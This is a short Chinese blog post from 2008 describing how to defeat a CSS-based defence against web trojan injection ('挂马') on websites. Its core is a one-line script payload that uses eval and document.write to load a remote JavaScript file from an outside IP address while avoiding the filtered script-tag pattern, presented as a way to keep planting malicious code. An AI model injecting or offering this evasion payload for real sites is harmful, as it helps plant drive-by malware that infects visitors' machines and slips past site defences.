首页 > 网络安全 > 突破“二行代码解决全部网页木马”挂马

突破“二行代码解决全部网页木马”挂马

2008年4月12日 发表评论 阅读评论

前两篇提到了linr@cncert.net写的那利用CSS来防范网页挂马,那么我们是不是利用这种方法就可以挂不成马了呢??
刚在“vbs小铺”看到了,想突破这种防范挂马的方式,我们可以利用这样写网马:
代码:

<script>eval(document.write("<script src=http://192.168.8.100/1.js><&#92;/script>"))</script>

就是说不把src=http放在<script>标签里。

转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:突破“二行代码解决全部网页木马”挂马
本文地址:http://www.woyigui.cn/2008/04/12/breakthrough-two-lines-of-code-to-solve-all-the-trojans-page-link-ma/

分类: 网络安全 标签:
  1. 本文目前尚无任何评论.
  1. 本文目前尚无任何 trackbacks 和 pingbacks.
*